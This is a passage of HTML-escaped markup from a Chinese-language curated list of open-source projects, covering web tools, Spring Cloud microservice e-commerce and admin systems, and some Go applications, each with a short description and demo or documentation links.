            &lt;a href=&quot;https://github.com/gchq/CyberChef&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;CyberChef&lt;/a&gt; - 网络瑞士军刀 - 用于加密、编码、压缩和数据分析的网络工具。&lt;a href=&quot;https://gchq.github.io/CyberChef/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/nocodb/nocodb&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;nocodb&lt;/a&gt; &lt;img src=&quot;https://img.shields.io/github/stars/nocodb/nocodb?style=social&quot; data-origin=&quot;https://img.shields.io/github/stars/nocodb/nocodb?style=social&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/forks/nocodb/nocodb?style=social&quot; data-origin=&quot;https://img.shields.io/github/forks/nocodb/nocodb?style=social&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/license/nocodb/nocodb&quot; data-origin=&quot;https://img.shields.io/github/license/nocodb/nocodb&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/last-commit/nocodb/nocodb&quot; data-origin=&quot;https://img.shields.io/github/last-commit/nocodb/nocodb&quot; alt=&quot;&quot;/&gt; - 将 &lt;code&gt;MySQL&lt;/code&gt;、&lt;code&gt;PostgreSQL&lt;/code&gt;、&lt;code&gt;SQL Server&lt;/code&gt;、&lt;code&gt;SQLite&lt;/code&gt; 或 &lt;code&gt;MariaDB&lt;/code&gt; 转换为智能电子表格。&lt;a href=&quot;https://docs.nocodb.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/vasanthv/talk&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;talk&lt;/a&gt; &lt;img src=&quot;https://img.shields.io/github/stars/vasanthv/talk?style=social&quot; data-origin=&quot;https://img.shields.io/github/stars/vasanthv/talk?style=social&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/forks/vasanthv/talk?style=social&quot; data-origin=&quot;https://img.shields.io/github/forks/vasanthv/talk?style=social&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/license/vasanthv/talk&quot; data-origin=&quot;https://img.shields.io/github/license/vasanthv/talk&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/last-commit/vasanthv/talk&quot; data-origin=&quot;https://img.shields.io/github/last-commit/vasanthv/talk&quot; alt=&quot;&quot;/&gt; - 无需下载、注册的网络群组视频通话。&lt;a href=&quot;https://vasanthv.github.io/talk/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/huasenjio/huasenjio-compose&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;huasenjio-compose&lt;/a&gt; - 基于 &lt;code&gt;Vue.js&lt;/code&gt; + &lt;code&gt;Node.js&lt;/code&gt; + &lt;code&gt;Docker&lt;/code&gt; 开发的多功能门户平台。&lt;a href=&quot;http://n.huasenjio.top/#/home&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/omnivore-app/omnivore&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;omnivore&lt;/a&gt; - 一个完整的开源“稍后阅读”解决方案，适合喜欢阅读的人。&lt;a href=&quot;https://omnivore.app/home&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/theajack/cnchar&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;cnchar&lt;/a&gt; - 功能全面的汉字工具库。&lt;a href=&quot;https://theajack.github.io/cnchar/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/leaningtech/webvm&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;webvm&lt;/a&gt; - 一个运行在浏览器中的 &lt;code&gt;Linux&lt;/code&gt; 虚拟机。&lt;a href=&quot;https://webvm.io/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/fmeringdal/nettu-meet&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;nettu-meet&lt;/a&gt; - 面向导师的开源视频会议系统。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/copy/v86&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;v86&lt;/a&gt; - 一个基于 &lt;code&gt;Web&lt;/code&gt; 的 &lt;code&gt;x86&lt;/code&gt; 模拟器，它通过将机器代码即时编译为 &lt;code&gt;WebAssembly&lt;/code&gt; 来实现出色的性能。&lt;a href=&quot;https://copy.sh/v86/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/foamzou/melody&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;melody&lt;/a&gt; - 音乐管理工具。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/mozilla/pdf.js&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;pdf.js&lt;/a&gt; - 一个基于 &lt;code&gt;Web&lt;/code&gt; 标准、用 &lt;code&gt;JavaScript&lt;/code&gt; 编写的 &lt;code&gt;PDF&lt;/code&gt; 阅读器。&lt;a href=&quot;https://mozilla.github.io/pdf.js/web/viewer.html&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/OpenWebGAL/WebGAL&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;WebGAL&lt;/a&gt; - 全新的网页端视觉小说引擎。&lt;a href=&quot;https://demo.openwebgal.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://docs.openwebgal.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;hr/&gt;
&lt;h2 id=&quot;微服务项目&quot;&gt;
    &lt;a href=&quot;?id=%e5%be%ae%e6%9c%8d%e5%8a%a1%e9%a1%b9%e7%9b%ae&quot; data-id=&quot;微服务项目&quot;&gt;微服务项目&lt;/a&gt;
&lt;/h2&gt;
&lt;ul class=&quot; list-paddingleft-2&quot;&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/gz-yami/mall4cloud&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;mall4cloud&lt;/a&gt; - 基于 &lt;code&gt;Spring Cloud&lt;/code&gt;、&lt;code&gt;Nacos&lt;/code&gt;、&lt;code&gt;Seata&lt;/code&gt;、&lt;code&gt;Mysql&lt;/code&gt;、&lt;code&gt;Redis&lt;/code&gt;、&lt;code&gt;RocketMQ&lt;/code&gt;、&lt;code&gt;canal&lt;/code&gt;、&lt;code&gt;ElasticSearch&lt;/code&gt;、&lt;code&gt;minio&lt;/code&gt; 的微服务 &lt;code&gt;B2B2C&lt;/code&gt; &lt;strong&gt;电商商城系统&lt;/strong&gt;，采用主流的互联网技术架构、全新的 &lt;code&gt;UI&lt;/code&gt; 设计、支持集群部署、服务注册和发现以及拥有完整的订单流程等，代码完全开源，没有任何二次封装，是一个非常适合二次开发的电商平台系统。&lt;a href=&quot;https://gitee.com/gz-yami/mall4cloud/tree/master/doc&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/YunaiV/yudao-cloud&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;yudao-cloud&lt;/a&gt; - &lt;a href=&quot;https://github.com/YunaiV/ruoyi-vue-pro&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;ruoyi-vue-pro&lt;/a&gt; 全新 &lt;code&gt;Cloud&lt;/code&gt; 版本，优化重构所有功能。基于 &lt;code&gt;Spring Cloud Alibaba&lt;/code&gt; + &lt;code&gt;MyBatis Plus&lt;/code&gt; + &lt;code&gt;Vue&lt;/code&gt; &amp;amp; &lt;code&gt;Element&lt;/code&gt; 实现的&lt;strong&gt;后台管理&lt;/strong&gt;系统 + 用户小程序，支持 &lt;code&gt;RBAC&lt;/code&gt; 动态权限、多租户、数据权限、工作流、三方登录、支付、短信、商城等功能。&lt;a href=&quot;http://dashboard.yudao.iocoder.cn/login?redirect=%2Findex&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://cloud.iocoder.cn/quick-start/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/FJ-OMS/oms-erp&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;oms-erp&lt;/a&gt; - 一站式全渠道&lt;strong&gt;业务中台系统&lt;/strong&gt;包括订单管理系统 &lt;code&gt;OMS&lt;/code&gt; /电商 &lt;code&gt;ERP&lt;/code&gt;、库存 &lt;code&gt;WMS&lt;/code&gt; 统一管理系统和 &lt;code&gt;SAP&lt;/code&gt; 财务管理系统等。&lt;a href=&quot;https://omni.k8s9.com/#/dashboard&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; 用户名：&lt;code&gt;demo&lt;/code&gt; 密码：&lt;code&gt;abcd1234&lt;/code&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/2227324689/gpmall&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;gpmall&lt;/a&gt; - 基于 &lt;code&gt;SpringBoot&lt;/code&gt; + &lt;code&gt;Dubbo&lt;/code&gt; + &lt;code&gt;kafka&lt;/code&gt;、&lt;code&gt;Elasticsearch&lt;/code&gt; 微服务架构构建的&lt;strong&gt;电商平台&lt;/strong&gt;。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Jackson0714/PassJava-Platform&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;PassJava-Platform&lt;/a&gt; - 一款&lt;strong&gt;面试刷题&lt;/strong&gt;的 &lt;code&gt;Spring Cloud&lt;/code&gt; 开源系统。采用流行的技术，&lt;code&gt;SpringBoot&lt;/code&gt;、&lt;code&gt;MyBatis&lt;/code&gt;、&lt;code&gt;Redis&lt;/code&gt;、 &lt;code&gt;MySQL&lt;/code&gt;、 &lt;code&gt;MongoDB&lt;/code&gt;、 &lt;code&gt;RabbitMQ&lt;/code&gt;、&lt;code&gt;ElasticSearch&lt;/code&gt;，采用 &lt;code&gt;Docker&lt;/code&gt; 容器化部署。&lt;a href=&quot;http://www.passjava.cn/#/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Jerusalem01/tesco-mall&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;tesco-mall&lt;/a&gt; - 一套完善的&lt;strong&gt;微服务电商系统&lt;/strong&gt;，由前台商城系统和后台管理系统构成，基于 &lt;code&gt;SpringBoot&lt;/code&gt;、&lt;code&gt;SpringCloud&lt;/code&gt;、&lt;code&gt;SpringCloud Alibaba&lt;/code&gt;、&lt;code&gt;Vue&lt;/code&gt; 实现，采用前后端分离开发模式。涵盖 &lt;code&gt;Restful&lt;/code&gt; 接口、数据校验、网关、注册发现、配置中心、熔断、限流、降级、链路追踪、性能监控、压力测试、系统预警、集群部署、持续集成、持续部署等。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/pig-mesh/pig&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;pig&lt;/a&gt; - 基于 &lt;code&gt;Spring Cloud 2021&lt;/code&gt; 、&lt;code&gt;Spring Boot 2.7&lt;/code&gt;、 &lt;code&gt;OAuth2&lt;/code&gt; 的 &lt;code&gt;RBAC&lt;/code&gt; &lt;strong&gt;权限管理系统&lt;/strong&gt;。&lt;a href=&quot;https://www.yuque.com/pig4cloud/pig/gg3ndm&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/matevip/matecloud&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;matecloud&lt;/a&gt; - 一款基于 &lt;code&gt;Spring Cloud Alibaba&lt;/code&gt; 的微服务架构。目前已经整合 &lt;code&gt;Spring Boot 2.7.0&lt;/code&gt;、 &lt;code&gt;Spring Cloud 2021&lt;/code&gt;、&lt;code&gt;Spring Cloud Alibaba 2021&lt;/code&gt;、&lt;code&gt;Spring Security Oauth2&lt;/code&gt;、&lt;code&gt;Feign&lt;/code&gt;、&lt;code&gt;Dubbo&lt;/code&gt;、&lt;code&gt;JetCache&lt;/code&gt;、&lt;code&gt;RocketMQ&lt;/code&gt; 等，支持多租户的低代码平台，&lt;code&gt;Saas&lt;/code&gt; 平台开发套件。&lt;a href=&quot;https://www.mate.vip/docs&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/techa03/goodsKill&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;goodsKill&lt;/a&gt; - 基于 &lt;code&gt;SpringCloud 2021.x&lt;/code&gt; + &lt;code&gt;Dubbo 3.x&lt;/code&gt; 构建的模拟秒杀微服务项目，集成了 &lt;code&gt;Elasticsearch&lt;/code&gt;、&lt;code&gt;Gateway&lt;/code&gt;、&lt;code&gt;Mybatis-Plus&lt;/code&gt;、&lt;code&gt;Sharding-JDBC&lt;/code&gt;等常用开源组件。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/roncoo/roncoo-education&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;roncoo-education&lt;/a&gt; - 分布式&lt;strong&gt;在线教育系统&lt;/strong&gt;。系统采用前后端分离模式，前台采用 &lt;code&gt;Vue.js&lt;/code&gt; 为核心框架，后台采用 &lt;code&gt;Spring Cloud&lt;/code&gt; 为核心框架。系统目前主要功能有课程点播功能，支持多家视频云的接入，课程附件管理功能，支持多家存储云的接入，讲师管理功能，支持讲师入驻功能等。&lt;a href=&quot;https://eduos.roncoo.net/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://eduos.roncoo.net/doc/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/smart-cloud/smart-cloud&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;smart-cloud&lt;/a&gt; - 基于 &lt;code&gt;SpringBoot&lt;/code&gt; &amp;amp;&amp;amp; &lt;code&gt;SpringCloud&lt;/code&gt; 的脚手架，支持服务合并部署与拆分部署、接口加解密签名、日志数据脱敏、接口数据 &lt;code&gt;mock&lt;/code&gt;、接口文档自动生成、请求幂等校验、接口日志&amp;amp;&amp;amp; &lt;code&gt;SQL&lt;/code&gt; 日志切面打印、分表分库分布式事务、国际化语言等。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/chillzhuang/SpringBlade&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;SpringBlade&lt;/a&gt; - &lt;code&gt;SpringCloud&lt;/code&gt; 分布式微服务架构、&lt;code&gt;SpringBoot&lt;/code&gt; 单体式微服务架构并存的综合型项目，采用 &lt;code&gt;Java8&lt;/code&gt; &lt;code&gt;API&lt;/code&gt; 重构了业务代码，完全遵循阿里巴巴编码规范。采用 &lt;code&gt;Spring Boot 2.7&lt;/code&gt; 、&lt;code&gt;Spring Cloud 2021&lt;/code&gt; 、&lt;code&gt;Mybatis&lt;/code&gt; 等核心技术，同时提供基于 &lt;code&gt;React&lt;/code&gt; 和 &lt;code&gt;Vue&lt;/code&gt; 的两个前端框架用于快速搭建企业级的 &lt;code&gt;SaaS&lt;/code&gt; 多租户微服务平台。&lt;a href=&quot;https://saber.bladex.vip/#/wel/index&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/wxiaoqi/Spring-Cloud-Platform&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Spring-Cloud-Platform&lt;/a&gt; - 微服务化 &lt;code&gt;RBAC&lt;/code&gt; 的管理平台。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/nageoffer/congomall&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;congomall&lt;/a&gt; - &lt;code&gt;TOC&lt;/code&gt; 商城系统，&lt;code&gt;SpringCloud-Alibaba&lt;/code&gt; 微服务架构设计，基于 &lt;code&gt;DDD&lt;/code&gt; 领域驱动模型开发，代码设计优雅，涵盖商城核心业务。系统集成分布式锁、分布式事务、分库分表、消息队列、数据搜索、服务监控等功能。&lt;a href=&quot;http://cmall.magestack.cn/#/home&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://magestack.cn/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/dromara/hmily&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;hmily&lt;/a&gt; - 金融级柔性分布式事务解决方案。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/zhoutaoo/SpringCloud&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;SpringCloud&lt;/a&gt; - 基于 &lt;code&gt;SpringCloud2.1&lt;/code&gt; 的微服务开发脚手架。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/fenixsoft/awesome-fenix&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;awesome-fenix&lt;/a&gt; - 讨论如何构建一套可靠的大型分布式系统。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/twelvet-s/twelvet&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;twelvet&lt;/a&gt; - 基于 &lt;code&gt;Spring Boot 3.X&lt;/code&gt; 的 &lt;code&gt;Spring Cloud Alibaba&lt;/code&gt; / &lt;code&gt;Spring Cloud Tencent&lt;/code&gt; +&lt;code&gt; React&lt;/code&gt; 的微服务框架。&lt;a href=&quot;https://cloud.twelvet.cn/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/lets-mica/mica&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;mica&lt;/a&gt; - &lt;code&gt;Spring Cloud&lt;/code&gt; 微服务开发核心工具集。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/201206030/novel-cloud&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;novel-cloud&lt;/a&gt; - 基于 &lt;code&gt;novel&lt;/code&gt; 构建的 &lt;code&gt;Spring Cloud&lt;/code&gt; 微服务技术栈学习型小说项目。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/pnoker/iot-dc3&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;iot-dc3&lt;/a&gt; - 基于 &lt;code&gt;Spring Cloud&lt;/code&gt; 的开源可分布式物联网 (&lt;code&gt;IOT&lt;/code&gt;) 平台。&lt;a href=&quot;https://doc.dc3.site/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/youlaitech/youlai-mall&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;youlai-mall&lt;/a&gt; - 基于 &lt;code&gt;Spring Boot 3&lt;/code&gt;、&lt;code&gt;Spring Cloud &amp;amp; Alibaba 2022&lt;/code&gt;、&lt;code&gt;SAS OAuth2&lt;/code&gt; 、&lt;code&gt;Vue3&lt;/code&gt;、&lt;code&gt;Element-Plus&lt;/code&gt;、&lt;code&gt;uni-app&lt;/code&gt; 构建的开源全栈商城。&lt;a href=&quot;https://www.youlai.tech/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt; &lt;a href=&quot;https://admin.youlai.tech/#/dashboard&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/mfish-qf/mfish-nocode&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;mfish-nocode&lt;/a&gt; - 基于 &lt;code&gt;SpringBoot3&lt;/code&gt; + &lt;code&gt;Spring Cloud Alibaba&lt;/code&gt; 实现的摸鱼低代码平台。&lt;a href=&quot;http://app.mfish.com.cn:11119/dashboard/workbench&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://www.mfish.com.cn/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/macrozheng/springcloud-learning&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;springcloud-learning&lt;/a&gt; - 一套涵盖大部分核心组件使用的 &lt;code&gt;Spring Cloud&lt;/code&gt; 教程。&lt;a href=&quot;https://www.macrozheng.com/cloud/cloud_catalog.html&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/nageoffer/shortlink&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;shortlink&lt;/a&gt; - &lt;code&gt;SaaS&lt;/code&gt; 短链接系统，承载高并发和海量存储等场景难题。&lt;a href=&quot;http://shortlink.nageoffer.com/home/space&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://nageoffer.com/shortlink/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://chen-coding.oss-cn-shenzhen.aliyuncs.com/create-center/r-nacos&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;r-nacos&lt;/a&gt; - 一个用 &lt;code&gt;Rust&lt;/code&gt; 实现的 &lt;code&gt;Nacos&lt;/code&gt; 服务。&lt;a href=&quot;https://www.bestreven.top/rnacos/manage/configs&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://r-nacos.github.io/docs/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;hr/&gt;
&lt;h2 id=&quot;go-项目&quot;&gt;
    &lt;a href=&quot;?id=go-%e9%a1%b9%e7%9b%ae&quot; data-id=&quot;go-项目&quot;&gt;&lt;code&gt;Go&lt;/code&gt; 项目&lt;/a&gt;
&lt;/h2&gt;
&lt;ul class=&quot; list-paddingleft-2&quot;&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/cloudreve/Cloudreve&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Cloudreve&lt;/a&gt; - 支持多家云存储的云盘系统。&lt;a href=&quot;https://demo.cloudreve.org/login&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://docs.cloudreve.org/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/charmbracelet/vhs&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;vhs&lt;/a&gt; - 一个 &lt;code&gt;Go&lt;/code&gt; 语言实现的终端视频录制工具。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/iawia002/lux&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;lux&lt;/a&gt; - 用 &lt;code&gt;Go&lt;/code&gt; 编写的快速简单的视频下载库和 &lt;code&gt;CLI&lt;/code&gt; 工具。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/ArtalkJS/Artalk&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Artalk&lt;/a&gt; - 自托管评论系统。&lt;a href=&quot;https://artalk.js.org/guide/intro.html&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/TruthHun/DocHub&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;DocHub&lt;/a&gt; - 参考百度文库，使用 &lt;code&gt;Beego&lt;/code&gt;（&lt;code&gt;Go&lt;/code&gt;）开发的开源文库系统。&lt;a href=&quot;https://www.wenkuzhijia.cn/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/mnt-ltd/moredoc&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;moredoc&lt;/a&gt; - 基于 &lt;code&gt;Go&lt;/code&gt; 开发的类似百度文库的开源文库系统。&lt;a href=&quot;https://moredoc.mnt.ltd/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
